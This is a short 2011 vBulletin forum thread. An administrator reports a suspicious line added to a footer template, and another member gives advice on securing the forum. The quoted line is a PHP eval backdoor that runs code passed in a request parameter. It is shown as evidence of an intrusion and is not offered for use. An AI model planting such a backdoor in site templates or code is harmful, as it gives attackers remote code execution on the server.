Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 14 Mar 2011, 00:31
Amenadiel's Avatar
Amenadiel Amenadiel is offline
 
Join Date: Sep 2006
hacking attempt? Modified template

My footer templates just got a new line:

<script type=\"text/javascript\">
<!-- // Main vBulletin Javascript Initialization
vBulletin_init();
{${eval($_REQUEST[dar])}}
//-->
</script>

I know I didn't insert that line in red. I haven't seen how is this exploited, and I can't explain how did they insert this line in my templates.
Reply With Quote
  #2  
Old 14 Mar 2011, 12:53
BirdOPrey5's Avatar
BirdOPrey5 BirdOPrey5 is offline
 
Join Date: Jun 2008
Real name: Joe D.
Well change your passwords (all admin accounts and your mysql password)...

Run the suspect files check to see if any files have been altered...

How many mods do you have, could be an exploit in a mod?

Are you running at least 3.8.5?

Check out this article for securing your forums:
http://www.vbulletin.org/forum/showthread.php?t=193930

You could ask your host to check the logs to see if they can see how you were hacked- some hosts are more cooperative than others.
__________________
-Joe
Former vBulletin.org Staff Member

(@BirdOPrey5) Former vb.org Moderator. Fighting for a free & independent vb.org.
BirdOPrey5.com - Exclusive VB Mods! (Formerly Qapla.com) | Joe's Ultimate Off Topic
Note - I do not read my PMs often, do not expect quick replies.
Reply With Quote
  #3  
Old 14 Mar 2011, 17:49
Amenadiel's Avatar
Amenadiel Amenadiel is offline
 
Join Date: Sep 2006
Yep, I'm onto that, I just can't understand what's done with the "extra code".

Is it even possible to get REQUEST vars from a template? I believe it isn't, you must pass through a plugin to do that.
Reply With Quote
  #4  
Old 14 Mar 2011, 17:56
BirdOPrey5's Avatar
BirdOPrey5 BirdOPrey5 is offline
 
Join Date: Jun 2008
Real name: Joe D.
I'm not really sure about $_REQUEST but if it's a valid php variable I don't see why it wouldn't work... I use "$_SERVER['HTTP_HOST'] all the time in templates.
__________________
-Joe
Former vBulletin.org Staff Member

(@BirdOPrey5) Former vb.org Moderator. Fighting for a free & independent vb.org.
BirdOPrey5.com - Exclusive VB Mods! (Formerly Qapla.com) | Joe's Ultimate Off Topic
Note - I do not read my PMs often, do not expect quick replies.
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


New To Site? Need Help?

All times are GMT. The time now is 10:29.

Layout Options | Width: Wide Color: